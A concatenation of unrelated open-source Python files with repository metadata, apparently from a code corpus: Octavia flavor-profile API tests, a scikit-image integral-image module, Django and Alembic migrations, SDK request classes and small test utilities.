self.assertIn(ref_fp_2, api_list) def test_get_all_fields_filter(self): fp1 = self.create_flavor_profile('test1', 'noop_driver', '{"image": "ubuntu"}') self.assertTrue(uuidutils.is_uuid_like(fp1.get('id'))) fp2 = self.create_flavor_profile('test2', 'noop_driver-alt', '{"image": "ubuntu"}') self.assertTrue(uuidutils.is_uuid_like(fp2.get('id'))) response = self.get(self.FPS_PATH, params={ 'fields': ['id', 'name']}) api_list = response.json.get(self.root_tag_list) self.assertEqual(2, len(api_list)) for profile in api_list: self.assertIn(u'id', profile) self.assertIn(u'name', profile) self.assertNotIn(constants.PROVIDER_NAME, profile) self.assertNotIn(constants.FLAVOR_DATA, profile) def test_get_all_authorized(self): fp1 = self.create_flavor_profile('test1', 'noop_driver', '{"image": "ubuntu"}') self.assertTrue(uuidutils.is_uuid_like(fp1.get('id'))) fp2 = self.create_flavor_profile('test2', 'noop_driver-alt', '{"image": "ubuntu"}') self.assertTrue(uuidutils.is_uuid_like(fp2.get('id'))) self.conf = self.useFixture(oslo_fixture.Config(cfg.CONF)) auth_strategy = self.conf.conf.api_settings.get('auth_strategy') self.conf.config(group='api_settings', auth_strategy=constants.TESTING) project_id = uuidutils.generate_uuid() with mock.patch.object(octavia.common.context.Context, 'project_id', project_id): override_credentials = { 'service_user_id': None, 'user_domain_id': None, 'is_admin_project': True, 'service_project_domain_id': None, 'service_project_id': None, 'roles': ['load-balancer_member'], 'user_id': None, 'is_admin': True, 'service_user_domain_id': None, 'project_domain_id': None, 'service_roles': [], 'project_id': project_id} with mock.patch( "oslo_context.context.RequestContext.to_policy_values", return_value=override_credentials): response = self.get(self.FPS_PATH) self.conf.config(group='api_settings', auth_strategy=auth_strategy) api_list = response.json.get(self.root_tag_list) self.assertEqual(2, len(api_list)) def test_get_all_not_authorized(self): fp1 = self.create_flavor_profile('test1', 'noop_driver', '{"image": "ubuntu"}') self.assertTrue(uuidutils.is_uuid_like(fp1.get('id'))) fp2 = self.create_flavor_profile('test2', 'noop_driver-alt', '{"image": "ubuntu"}') self.assertTrue(uuidutils.is_uuid_like(fp2.get('id'))) self.conf = self.useFixture(oslo_fixture.Config(cfg.CONF)) auth_strategy = self.conf.conf.api_settings.get('auth_strategy') self.conf.config(group='api_settings', auth_strategy=constants.TESTING) self.get(self.FPS_PATH, status=403) self.conf.config(group='api_settings', auth_strategy=auth_strategy) def test_update(self): fp = self.create_flavor_profile('test_profile', 'noop_driver', '{"x": "y"}') update_data = {'name': 'the_profile', constants.PROVIDER_NAME: 'noop_driver-alt', constants.FLAVOR_DATA: '{"hello": "world"}'} body = self._build_body(update_data) response = self.put(self.FP_PATH.format(fp_id=fp.get('id')), body) response = self.get( self.FP_PATH.format(fp_id=fp.get('id'))).json.get(self.root_tag) self.assertEqual('the_profile', response.get('name')) self.assertEqual('noop_driver-alt', response.get(constants.PROVIDER_NAME)) self.assertEqual('{"hello": "world"}', response.get(constants.FLAVOR_DATA)) def test_update_deleted_id(self): update_data = {'name': 'fake_profile'} body = self._build_body(update_data) response = self.put(self.FP_PATH.format(fp_id=constants.NIL_UUID), body, status=404) self.assertEqual('Flavor profile {} not found.'.format( constants.NIL_UUID), response.json.get('faultstring')) def test_update_nothing(self): fp = self.create_flavor_profile('test_profile', 'noop_driver', '{"x": "y"}') body = self._build_body({}) response = self.put(self.FP_PATH.format(fp_id=fp.get('id')), body) response = self.get( self.FP_PATH.format(fp_id=fp.get('id'))).json.get(self.root_tag) self.assertEqual('test_profile', response.get('name')) self.assertEqual('noop_driver', response.get(constants.PROVIDER_NAME)) self.assertEqual('{"x": "y"}', response.get(constants.FLAVOR_DATA)) def test_update_name_none(self): self._test_update_param_none(constants.NAME) def test_update_provider_name_none(self): self._test_update_param_none(constants.PROVIDER_NAME) def test_update_flavor_data_none(self): self._test_update_param_none(constants.FLAVOR_DATA) def _test_update_param_none(self, param_name): fp = self.create_flavor_profile('test_profile', 'noop_driver', '{"x": "y"}') expect_error_msg = ("None is not a valid option for %s" % param_name) body = self._build_body({param_name: None}) response = self.put(self.FP_PATH.format(fp_id=fp.get('id')), body, status=400) self.assertEqual(expect_error_msg, response.json['faultstring']) def test_update_no_flavor_data(self): fp = self.create_flavor_profile('test_profile', 'noop_driver', '{"x": "y"}') update_data = {'name': 'the_profile', constants.PROVIDER_NAME: 'noop_driver-alt'} body = self._build_body(update_data) response = self.put(self.FP_PATH.format(fp_id=fp.get('id')), body) response = self.get( self.FP_PATH.format(fp_id=fp.get('id'))).json.get(self.root_tag) self.assertEqual('the_profile', response.get('name')) self.assertEqual('noop_driver-alt', response.get(constants.PROVIDER_NAME)) self.assertEqual('{"x": "y"}', response.get(constants.FLAVOR_DATA)) def test_update_authorized(self): fp = self.create_flavor_profile('test_profile', 'noop_driver', '{"x": "y"}') update_data = {'name': 'the_profile', constants.PROVIDER_NAME: 'noop_driver-alt', constants.FLAVOR_DATA: '{"hello": "world"}'} body = self._build_body(update_data) self.conf = self.useFixture(oslo_fixture.Config(cfg.CONF)) auth_strategy = self.conf.conf.api_settings.get('auth_strategy') self.conf.config(group='api_settings', auth_strategy=constants.TESTING) project_id = uuidutils.generate_uuid() with mock.patch.object(octavia.common.context.Context, 'project_id', project_id): override_credentials = { 'service_user_id': None, 'user_domain_id': None, 'is_admin_project': True, 'service_project_domain_id': None, 'service_project_id': None, 'roles': ['load-balancer_member'], 'user_id': None, 'is_admin': True, 'service_user_domain_id': None, 'project_domain_id': None, 'service_roles': [], 'project_id': project_id} with mock.patch( "oslo_context.context.RequestContext.to_policy_values", return_value=override_credentials): response = self.put(self.FP_PATH.format(fp_id=fp.get('id')), body) self.conf.config(group='api_settings', auth_strategy=auth_strategy) response = self.get( self.FP_PATH.format(fp_id=fp.get('id'))).json.get(self.root_tag) self.assertEqual('the_profile', response.get('name')) self.assertEqual('noop_driver-alt', response.get(constants.PROVIDER_NAME)) self.assertEqual('{"hello": "world"}', response.get(constants.FLAVOR_DATA)) def test_update_not_authorized(self): fp = self.create_flavor_profile('test_profile', 'noop_driver', '{"x": "y"}') update_data = {'name': 'the_profile', constants.PROVIDER_NAME: 'amp', constants.FLAVOR_DATA: '{"hello": "world"}'} body = self._build_body(update_data) self.conf = self.useFixture(oslo_fixture.Config(cfg.CONF)) auth_strategy = self.conf.conf.api_settings.get('auth_strategy') self.conf.config(group='api_settings', auth_strategy=constants.TESTING) response = self.put(self.FP_PATH.format(fp_id=fp.get('id')), body, status=403) self.conf.config(group='api_settings', auth_strategy=auth_strategy) response = self.get( self.FP_PATH.format(fp_id=fp.get('id'))).json.get(self.root_tag) self.assertEqual('test_profile', response.get('name')) self.assertEqual('noop_driver', response.get(constants.PROVIDER_NAME)) self.assertEqual('{"x": "y"}', response.get(constants.FLAVOR_DATA)) def test_update_in_use(self): fp = self.create_flavor_profile('test_profile', 'noop_driver', '{"x": "y"}') self.create_flavor('name1', 'description', fp.get('id'), True) # Test updating provider while in use is not allowed update_data = {'name': 'the_profile', constants.PROVIDER_NAME: 'noop_driver-alt'} body = self._build_body(update_data) response = self.put(self.FP_PATH.format(fp_id=fp.get('id')), body, status=409) err_msg = ("Flavor profile {} is in use and cannot be " "modified.".format(fp.get('id'))) self.assertEqual(err_msg, response.json.get('faultstring')) response = self.get( self.FP_PATH.format(fp_id=fp.get('id'))).json.get(self.root_tag) self.assertEqual('test_profile', response.get('name')) self.assertEqual('noop_driver', response.get(constants.PROVIDER_NAME)) self.assertEqual('{"x": "y"}', response.get(constants.FLAVOR_DATA)) # Test updating flavor data while in use is not allowed update_data = {'name': 'the_profile', constants.FLAVOR_DATA: '{"hello": "world"}'} body = self._build_body(update_data) response = self.put(self.FP_PATH.format(fp_id=fp.get('id')), body, status=409) err_msg = ("Flavor profile {} is in use and cannot be " "modified.".format(fp.get('id'))) self.assertEqual(err_msg, response.json.get('faultstring')) response = self.get( self.FP_PATH.format(fp_id=fp.get('id'))).json.get(self.root_tag) self.assertEqual('test_profile', response.get('name')) self.assertEqual('noop_driver', response.get(constants.PROVIDER_NAME)) self.assertEqual('{"x": "y"}', response.get(constants.FLAVOR_DATA)) # Test that you can still update the name when in use update_data = {'name': 'the_profile'} body = self._build_body(update_data) response = self.put(self.FP_PATH.format(fp_id=fp.get('id')), body) response = self.get( self.FP_PATH.format(fp_id=fp.get('id'))).json.get(self.root_tag) self.assertEqual('the_profile', response.get('name')) self.assertEqual('noop_driver', response.get(constants.PROVIDER_NAME)) self.assertEqual('{"x": "y"}', response.get(constants.FLAVOR_DATA)) def test_delete(self): fp = self.create_flavor_profile('test1', 'noop_driver', '{"image": "ubuntu"}') self.assertTrue(uuidutils.is_uuid_like(fp.get('id'))) self.delete(self.FP_PATH.format(fp_id=fp.get('id'))) response = self.get(self.FP_PATH.format( fp_id=fp.get('id')), status=404) err_msg = "Flavor Profile %s not found." % fp.get('id') self.assertEqual(err_msg, response.json.get('faultstring')) def test_delete_deleted_id(self): response = self.delete(self.FP_PATH.format(fp_id=constants.NIL_UUID), status=404) self.assertEqual('Flavor profile {} not found.'.format( constants.NIL_UUID), response.json.get('faultstring')) def test_delete_nonexistent_id(self): response = self.delete(self.FP_PATH.format(fp_id='bogus_id'), status=404) self.assertEqual('Flavor profile bogus_id not found.', response.json.get('faultstring')) def test_delete_authorized(self): fp = self.create_flavor_profile('test1', 'noop_driver', '{"image": "ubuntu"}') self.assertTrue(uuidutils.is_uuid_like(fp.get('id'))) self.conf = self.useFixture(oslo_fixture.Config(cfg.CONF)) auth_strategy = self.conf.conf.api_settings.get('auth_strategy') self.conf.config(group='api_settings', auth_strategy=constants.TESTING) project_id = uuidutils.generate_uuid() with mock.patch.object(octavia.common.context.Context, 'project_id', project_id): override_credentials = { 'service_user_id': None, 'user_domain_id': None, 'is_admin_project': True, 'service_project_domain_id': None, 'service_project_id': None, 'roles': ['load-balancer_member'], 'user_id': None, 'is_admin': True, 'service_user_domain_id': None, 'project_domain_id': None, 'service_roles': [], 'project_id': project_id} with mock.patch( "oslo_context.context.RequestContext.to_policy_values", return_value=override_credentials): self.delete(self.FP_PATH.format(fp_id=fp.get('id'))) self.conf.config(group='api_settings', auth_strategy=auth_strategy) response = self.get(self.FP_PATH.format( fp_id=fp.get('id')), status=404) err_msg = "Flavor Profile %s not found." % fp.get('id') self.assertEqual(err_msg, response.json.get('faultstring')) def test_delete_not_authorized(self): fp = self.create_flavor_profile('test1', 'noop_driver', '{"image": "ubuntu"}') self.assertTrue(uuidutils.is_uuid_like(fp.get('id'))) self.conf = self.useFixture(oslo_fixture.Config(cfg.CONF)) auth_strategy = self.conf.conf.api_settings.get('auth_strategy') self.conf.config(group='api_settings', auth_strategy=constants.TESTING) response = self.delete(self.FP_PATH.format( fp_id=fp.get('id')), status=403) api_fp = response.json self.conf.config(group='api_settings', auth_strategy=auth_strategy) self.assertEqual(self.NOT_AUTHORIZED_BODY, api_fp) response = self.get( self.FP_PATH.format(fp_id=fp.get('id'))).json.get(self.root_tag) self.assertEqual('test1', response.get('name')) def test_delete_in_use(self): fp = self.create_flavor_profile('test1', 'noop_driver', '{"image": "ubuntu"}') self.create_flavor('name1', 'description', fp.get('id'), True) response = self.delete(self.FP_PATH.format(fp_id=fp.get('id')), status=409) err_msg = ("Flavor profile {} is in use and cannot be " "modified.".format(fp.get('id'))) self.assertEqual(err_msg, response.json.get('faultstring')) response = self.get( self.FP_PATH.format(fp_id=fp.get('id'))).json.get(self.root_tag) self.assertEqual('test1', response.get('name'))
49.886598
79
0.597644
3503a652c351bffd54f475a1937194144e327487
1,479
py
Python
skimage/transform/integral.py
odebeir/scikits-image
13b2170dfd3ee9065ba6d65f29ff37f6b3bf948e
[ "BSD-3-Clause" ]
8
2016-03-11T13:23:51.000Z
2021-12-19T10:43:26.000Z
skimage/transform/integral.py
odebeir/scikits-image
13b2170dfd3ee9065ba6d65f29ff37f6b3bf948e
[ "BSD-3-Clause" ]
5
2021-03-19T08:36:48.000Z
2022-01-13T01:52:34.000Z
skimage/transform/integral.py
odebeir/scikits-image
13b2170dfd3ee9065ba6d65f29ff37f6b3bf948e
[ "BSD-3-Clause" ]
4
2020-06-19T00:04:34.000Z
2021-02-23T07:24:00.000Z
import numpy as np def integral_image(x): """Integral image / summed area table. The integral image contains the sum of all elements above and to the left of it, i.e.: .. math:: S[m, n] = \sum_{i \leq m} \sum_{j \leq n} X[i, j] Parameters ---------- x : ndarray Input image. Returns ------- S : ndarray Integral image / summed area table. References ---------- .. [1] F.C. Crow, "Summed-area tables for texture mapping," ACM SIGGRAPH Computer Graphics, vol. 18, 1984, pp. 207-212. """ return x.cumsum(1).cumsum(0) def integrate(ii, r0, c0, r1, c1): """Use an integral image to integrate over a given window. Parameters ---------- ii : ndarray Integral image. r0, c0 : int or ndarray Top-left corner(s) of block to be summed. r1, c1 : int or ndarray Bottom-right corner(s) of block to be summed. Returns ------- S : scalar or ndarray Integral (sum) over the given window(s). """ if np.isscalar(r0): r0, c0, r1, c1 = [np.asarray([x]) for x in (r0, c0, r1, c1)] S = np.zeros(r0.shape, ii.dtype) S += ii[r1, c1] good = (r0 >= 1) & (c0 >= 1) S[good] += ii[r0[good] - 1, c0[good] - 1] good = r0 >= 1 S[good] -= ii[r0[good] - 1, c1[good]] good = c0 >= 1 S[good] -= ii[r1[good], c0[good] - 1] if S.size == 1: return np.asscalar(S) return S
20.830986
72
0.529412
992154694fca84a12a87b45f9714c1c9d5ff7674
3,498
py
Python
articat/tests/utils.py
related-sciences/articat
76f6469484afc0525f5a9a3a418f28dd8e2a900b
[ "Apache-2.0" ]
2
2021-10-20T10:24:49.000Z
2021-12-01T01:53:30.000Z
articat/tests/utils.py
related-sciences/articat
76f6469484afc0525f5a9a3a418f28dd8e2a900b
[ "Apache-2.0" ]
21
2021-07-12T20:06:52.000Z
2022-02-08T21:48:08.000Z
articat/tests/utils.py
related-sciences/articat
76f6469484afc0525f5a9a3a418f28dd8e2a900b
[ "Apache-2.0" ]
null
null
null
import os from contextlib import contextmanager from datetime import date, timedelta from functools import lru_cache from random import shuffle from typing import TYPE_CHECKING, ClassVar, Iterator, Optional, Type, TypeVar import fsspec from google.cloud import datastore from articat.artifact import ID, Partition, Version from articat.catalog import Catalog from articat.catalog_datastore import CatalogDatastore from articat.config import ArticatConfig from articat.fs_artifact import FSArtifact T = TypeVar("T", bound="TestFSArtifactMixin") class TestCatalog(CatalogDatastore): """Datastore Catalog used for tests""" @classmethod @lru_cache def _client( cls, project: str = "foobar", namespace: Optional[str] = None ) -> datastore.Client: os.environ["DATASTORE_EMULATOR_HOST"] = "127.0.0.1:8099" return datastore.Client(project=project, namespace=namespace) if TYPE_CHECKING: # NOTE: we want to use TestFSArtifactMixin across multiple # test classes, and flavours of FSArtifact BASE_CLASS = FSArtifact else: BASE_CLASS = object class TestFSArtifactMixin(BASE_CLASS): # Note: we overwrite str format in tests to avoid partition path conflicts # for versioned outputs _partition_str_format: ClassVar[str] = "%Y%m%dT%H%M%S%f" @classmethod def _catalog(cls) -> "Type[Catalog]": return TestCatalog @classmethod @contextmanager def dummy_versioned_ctx( cls: Type[T], uid: ID, version: Version, dev: bool = False ) -> Iterator[T]: with cls.versioned(uid, version, dev=dev) as a: with fsspec.open(a.joinpath("output.txt"), "w") as f: f.write("ala ma kota") a.files_pattern = f"{a.staging_file_prefix}/output.txt" yield a @classmethod def write_dummy_versioned( cls: Type[T], uid: ID, version: Version, dev: bool = False ) -> T: with cls.dummy_versioned_ctx(uid, version, dev=dev) as a: ... return a @classmethod @contextmanager def dummy_partitioned_ctx( cls: Type[T], uid: ID, partition: Partition, dev: bool = False ) -> Iterator[T]: with cls.partitioned(uid, partition=partition, dev=dev) as a: with fsspec.open(a.joinpath("output.txt"), "w") as f: f.write("ala ma kota") assert ArticatConfig.fs_tmp_prefix() in a.staging_file_prefix a.files_pattern = f"{a.staging_file_prefix}/output.txt" yield a @classmethod def write_dummy_partitioned( cls: Type[T], uid: ID, partition: Partition, dev: bool = False ) -> T: with cls.dummy_partitioned_ctx(uid, partition, dev=dev) as a: ... return a class TestFSArtifact(TestFSArtifactMixin, FSArtifact): """FSArtifact used for tests""" __test__: ClassVar[bool] = False """ This field prevents pytest from interpreting TestFSArtifact as a test class. Artifact can also check for the existence of __test__ to check if it's running the the test context. """ def write_a_couple_of_partitions(uid: ID, n: int) -> None: # we shuffle the partitions to further tests ordering etc ns = list(range(n)) shuffle(ns) for i in ns: dt = date.today() - timedelta(days=i) TestFSArtifact.write_dummy_partitioned(uid, dt) # write some unrelated dataset TestFSArtifact.write_dummy_partitioned(f"{uid}1234", dt)
32.091743
78
0.670669
9a327b067a0d36d4754df4890de769bd8d78f2d8
2,335
py
Python
django_airavata/apps/auth/migrations/0008_auto_20210422_1838.py
akbranam/airavata-django-portal
2ba71a34af95b58ba225abb6d5ad1d969af92142
[ "Apache-2.0" ]
19
2017-09-04T00:36:52.000Z
2022-01-24T08:44:22.000Z
django_airavata/apps/auth/migrations/0008_auto_20210422_1838.py
akbranam/airavata-django-portal
2ba71a34af95b58ba225abb6d5ad1d969af92142
[ "Apache-2.0" ]
35
2017-10-17T02:36:01.000Z
2022-03-09T04:46:57.000Z
django_airavata/apps/auth/migrations/0008_auto_20210422_1838.py
akbranam/airavata-django-portal
2ba71a34af95b58ba225abb6d5ad1d969af92142
[ "Apache-2.0" ]
38
2017-09-15T14:17:42.000Z
2021-12-15T17:11:31.000Z
# Generated by Django 2.2.17 on 2021-04-22 18:38 import uuid import django.db.models.deletion from django.conf import settings from django.db import migrations, models from django_airavata.apps.auth.models import VERIFY_EMAIL_CHANGE_TEMPLATE def default_templates(apps, schema_editor): EmailTemplate = apps.get_model("django_airavata_auth", "EmailTemplate") verify_email_template = EmailTemplate( template_type=VERIFY_EMAIL_CHANGE_TEMPLATE, subject="{{first_name}} {{last_name}} ({{username}}), " "Please Verify Your New Email Address in {{portal_title}}", body=""" <p> Dear {{first_name}} {{last_name}}, </p> <p> Before your email address change can be processed, you need to verify your new email address ({{email}}). Click the link below to verify your email address: </p> <p><a href="{{url}}">{{url}}</a></p> """.strip()) verify_email_template.save() class Migration(migrations.Migration): dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ('django_airavata_auth', '0007_auto_20200917_1610'), ] operations = [ migrations.AlterField( model_name='emailtemplate', name='template_type', field=models.IntegerField(choices=[(1, 'Verify Email Template'), (2, 'New User Email Template'), (3, 'Password Reset Email Template'), (4, 'User Added to Group Template'), (5, 'Verify Email Change Template')], primary_key=True, serialize=False), ), migrations.CreateModel( name='PendingEmailChange', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('email_address', models.EmailField(max_length=254)), ('verification_code', models.CharField(default=uuid.uuid4, max_length=36, unique=True)), ('created_date', models.DateTimeField(auto_now_add=True)), ('verified', models.BooleanField(default=False)), ('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)), ], ), migrations.RunPython(default_templates, migrations.RunPython.noop), ]
38.916667
257
0.643255
b5b5826fc5f3a62d3a91b26bd49de9e2645ba626
2,396
py
Python
datagen/utilities/collectAreaAndDelay.py
animeshbchowdhury/OpenABC
140191680bbe7843b1407af5822b099421212cf1
[ "BSD-3-Clause" ]
18
2021-10-10T00:19:59.000Z
2022-03-22T01:24:58.000Z
datagen/utilities/collectAreaAndDelay.py
animeshbchowdhury/OpenABC
140191680bbe7843b1407af5822b099421212cf1
[ "BSD-3-Clause" ]
1
2021-12-22T19:37:33.000Z
2021-12-22T20:52:09.000Z
datagen/utilities/collectAreaAndDelay.py
animeshbchowdhury/OpenABC
140191680bbe7843b1407af5822b099421212cf1
[ "BSD-3-Clause" ]
1
2022-02-21T15:09:47.000Z
2022-02-21T15:09:47.000Z
import os,sys import re,argparse import os.path as osp designSet1 = ['i2c','spi','des3_area','ss_pcm','usb_phy','sasc','wb_dma','simple_spi'] designSet2 = ['dynamic_node','aes','pci','ac97_ctrl','mem_ctrl','tv80','fpu'] designSet3 = ['wb_conmax','tinyRocket','aes_xcrypt','aes_secworks'] designSet4 = ['jpeg','bp_be','ethernet','vga_lcd','picosoc'] designSet5 = ['dft','idft','fir','iir','sha256'] homeDir = None benchDataFolder = None statsDataFolder = None designs = designSet1+designSet2+designSet3+designSet4+designSet5 NUM_SYNTHESIZED_DESIGNS = 1500 csvDelimiter = "," designSet = designSet1+designSet2+designSet3+designSet4+designSet5 def getFileLines(filePath): f = open(filePath,'r') fLines = f.readlines() f.close() return fLines def collectAreaAndDelay(): adpFolder = osp.join(statsDataFolder,"adp") if not os.path.exists(adpFolder): os.mkdir(adpFolder) for des in designs: desLogDir = osp.join(benchDataFolder,des,"log_"+des) csv_file = os.path.join(adpFolder, 'adp_'+des+'.csv') csvFileHandler = open(csv_file,'w+') csvFileHandler.write("sid,area,delay\n") for i in range(NUM_SYNTHESIZED_DESIGNS): synth_stat_file = os.path.join(desLogDir,'log_'+des+"_syn"+str(i)+'.log') synthFileLines = getFileLines(synth_stat_file) information = re.findall('[a-zA-Z0-9.]+',synthFileLines[-1]) csvFileHandler.write(str(i)+csvDelimiter+str(information[-9])+csvDelimiter+str(information[-4])+"\n") csvFileHandler.close() def setGlobalAndEnvironmentVars(cmdArgs): global homeDir,benchDataFolder,statsDataFolder homeDir = cmdArgs.home if not (os.path.exists(homeDir)): print("\nPlease rerun with appropriate paths") benchDataFolder = os.path.join(homeDir,"OPENABC_DATASET","bench") statsDataFolder = os.path.join(homeDir,"OPENABC_DATASET","statistics") def parseCmdLineArgs(): parser = argparse.ArgumentParser(prog='Final AIG area and delay Collection', description="Circuit characteristics") parser.add_argument('--version',action='version', version='1.0.0') parser.add_argument('--home',required=True, help="OpenABC dataset home path") return parser.parse_args() def main(): cmdArgs = parseCmdLineArgs() setGlobalAndEnvironmentVars(cmdArgs) collectAreaAndDelay() if __name__ == '__main__': main()
36.861538
119
0.702003
49ee95dd998d6a46a62aa0a68099b0ef80babadd
840
py
Python
talentmap_api/common/management/commands/create_base_permissions.py
MetaPhase-Consulting/State-TalentMAP-API
4e238cbfe241fd3d0a718a9a0fc038dbed00f13b
[ "CC0-1.0" ]
7
2018-10-17T15:13:05.000Z
2021-12-10T14:53:38.000Z
talentmap_api/common/management/commands/create_base_permissions.py
MetaPhase-Consulting/State-TalentMAP-API
4e238cbfe241fd3d0a718a9a0fc038dbed00f13b
[ "CC0-1.0" ]
208
2018-12-28T17:11:00.000Z
2022-03-29T18:47:23.000Z
talentmap_api/common/management/commands/create_base_permissions.py
MetaPhase-Consulting/State-TalentMAP-API
4e238cbfe241fd3d0a718a9a0fc038dbed00f13b
[ "CC0-1.0" ]
null
null
null
from django.core.management.base import BaseCommand import logging from django.contrib.auth.models import Group class Command(BaseCommand): help = 'Creates application-wide permissions and groups' logger = logging.getLogger(__name__) def __init__(self, *args, **kwargs): super(Command, self).__init__(*args, **kwargs) self.groups = [ "bidder", "cdo", "bureau_ao", "glossary_editors", "bidcycle_admin", "superuser", "bureau_user", "ao_user", "post_user", ] def handle(self, *args, **options): for group_name in self.groups: group = Group.objects.get_or_create(name=group_name) if group[1]: self.logger.info(f"Created group {group_name}")
26.25
64
0.578571
3e1b52c4b51dd8de73eb0dd715ad76752b3dbfef
603
py
Python
tensorhive/migrations/versions/58a12e45663e_add_hostname_column_to_the_resources_.py
roscisz/TensorHive
4a680f47a0ee1ce366dc82ad9964e229d9749c4e
[ "Apache-2.0" ]
129
2017-08-25T11:45:15.000Z
2022-03-29T05:11:25.000Z
tensorhive/migrations/versions/58a12e45663e_add_hostname_column_to_the_resources_.py
roscisz/TensorHive
4a680f47a0ee1ce366dc82ad9964e229d9749c4e
[ "Apache-2.0" ]
251
2017-07-27T10:05:58.000Z
2022-03-02T12:46:13.000Z
tensorhive/migrations/versions/58a12e45663e_add_hostname_column_to_the_resources_.py
roscisz/TensorHive
4a680f47a0ee1ce366dc82ad9964e229d9749c4e
[ "Apache-2.0" ]
20
2017-08-13T13:05:14.000Z
2022-03-19T02:21:37.000Z
"""Add hostname column to the resources table Revision ID: 58a12e45663e Revises: 06ce06e9bb85 Create Date: 2020-10-20 18:24:40.267394 """ from alembic import op import sqlalchemy as sa # revision identifiers, used by Alembic. revision = '58a12e45663e' down_revision = '06ce06e9bb85' branch_labels = None depends_on = None def upgrade(): with op.batch_alter_table('resources') as batch_op: batch_op.add_column(sa.Column('hostname', sa.String(length=64), nullable=True)) def downgrade(): with op.batch_alter_table('resources') as batch_op: batch_op.drop_column('hostname')
22.333333
87
0.74461
ef9bd30b7501bb0dd13a1a0c38aad8fefc9664c2
1,610
py
Python
aliyun-python-sdk-ccc/aliyunsdkccc/request/v20170705/GetRecordOssUploadParamRequest.py
jia-jerry/aliyun-openapi-python-sdk
e90f3683a250cfec5b681b5f1d73a68f0dc9970d
[ "Apache-2.0" ]
1
2021-03-08T02:59:17.000Z
2021-03-08T02:59:17.000Z
aliyun-python-sdk-ccc/aliyunsdkccc/request/v20170705/GetRecordOssUploadParamRequest.py
jia-jerry/aliyun-openapi-python-sdk
e90f3683a250cfec5b681b5f1d73a68f0dc9970d
[ "Apache-2.0" ]
1
2020-05-31T14:51:47.000Z
2020-05-31T14:51:47.000Z
aliyun-python-sdk-ccc/aliyunsdkccc/request/v20170705/GetRecordOssUploadParamRequest.py
jia-jerry/aliyun-openapi-python-sdk
e90f3683a250cfec5b681b5f1d73a68f0dc9970d
[ "Apache-2.0" ]
null
null
null
# Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # # http://www.apache.org/licenses/LICENSE-2.0 # # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. from aliyunsdkcore.request import RpcRequest from aliyunsdkccc.endpoint import endpoint_data class GetRecordOssUploadParamRequest(RpcRequest): def __init__(self): RpcRequest.__init__(self, 'CCC', '2017-07-05', 'GetRecordOssUploadParam') self.set_method('POST') if hasattr(self, "endpoint_map"): setattr(self, "endpoint_map", endpoint_data.getEndpointMap()) if hasattr(self, "endpoint_regional"): setattr(self, "endpoint_regional", endpoint_data.getEndpointRegional()) def get_InstanceId(self): return self.get_query_params().get('InstanceId') def set_InstanceId(self,InstanceId): self.add_query_param('InstanceId',InstanceId) def get_FileName(self): return self.get_query_params().get('FileName') def set_FileName(self,FileName): self.add_query_param('FileName',FileName)
36.590909
76
0.768323
3e257987a705a275fde7132f4219c8f8360e7356
602
py
Python
thecut/ordering/receivers.py
exemplarysoftware/thecut-ordering
7de68cd993e2a1833863c83d2f3edd34dae9571b
[ "Apache-2.0" ]
null
null
null
thecut/ordering/receivers.py
exemplarysoftware/thecut-ordering
7de68cd993e2a1833863c83d2f3edd34dae9571b
[ "Apache-2.0" ]
null
null
null
thecut/ordering/receivers.py
exemplarysoftware/thecut-ordering
7de68cd993e2a1833863c83d2f3edd34dae9571b
[ "Apache-2.0" ]
null
null
null
# -*- coding: utf-8 -*- from __future__ import absolute_import, unicode_literals from django.db.models import Max def set_order(sender, instance, **kwargs): """If not set, determine and set the instance's order value.""" from .models import OrderMixin is_order_subclass = issubclass(instance.__class__, OrderMixin) raw = kwargs.get('raw', False) if is_order_subclass and not any([instance.pk, instance.order, raw]): order = instance.__class__.objects.aggregate( order=Max('order')).get('order') instance.order = order + 1 if order is not None else 1
35.411765
73
0.694352
e3b286be06c7cdde074647e23434bbc9a31b0519
637
py
Python
tests/test_util.py
michaelrath-work/spojit
75b8c920a342ca9b7869b2fdd826f0b468482341
[ "MIT" ]
null
null
null
tests/test_util.py
michaelrath-work/spojit
75b8c920a342ca9b7869b2fdd826f0b468482341
[ "MIT" ]
null
null
null
tests/test_util.py
michaelrath-work/spojit
75b8c920a342ca9b7869b2fdd826f0b468482341
[ "MIT" ]
null
null
null
import pytest from spojit.util import date_time_to_timestamp from spojit.util import resource_similarity def test_date_time_to_timestamp(): assert 1497967200 == date_time_to_timestamp("2017-06-20T16:00:00Z") def test_resource_similarity(): assert pytest.approx(0.5, 0.01) == resource_similarity( ["a", "b", "c", "d"], ["a", "c", "e"] ) assert pytest.approx(0.5, 0.01) == resource_similarity( ["a", "c", "e"], ["a", "b", "c", "d"] ) assert pytest.approx(0.0, 0.01) == resource_similarity(["a", "a"], ["b"]) assert pytest.approx(0.5, 0.01) == resource_similarity(["a", "a"], ["b", "a"])
27.695652
82
0.616954
ed84901f3b1d1e91252a6f743abe5ddd8fab5dff
155
py
Python
tests/model_control/detailed/transf_Quantization/model_control_one_enabled_Quantization_MovingMedian_NoCycle_AR.py
shaido987/pyaf
b9afd089557bed6b90b246d3712c481ae26a1957
[ "BSD-3-Clause" ]
377
2016-10-13T20:52:44.000Z
2022-03-29T18:04:14.000Z
tests/model_control/detailed/transf_Quantization/model_control_one_enabled_Quantization_MovingMedian_NoCycle_AR.py
ysdede/pyaf
b5541b8249d5a1cfdc01f27fdfd99b6580ed680b
[ "BSD-3-Clause" ]
160
2016-10-13T16:11:53.000Z
2022-03-28T04:21:34.000Z
tests/model_control/detailed/transf_Quantization/model_control_one_enabled_Quantization_MovingMedian_NoCycle_AR.py
ysdede/pyaf
b5541b8249d5a1cfdc01f27fdfd99b6580ed680b
[ "BSD-3-Clause" ]
63
2017-03-09T14:51:18.000Z
2022-03-27T20:52:57.000Z
import tests.model_control.test_ozone_custom_models_enabled as testmod testmod.build_model( ['Quantization'] , ['MovingMedian'] , ['NoCycle'] , ['AR'] );
38.75
82
0.748387
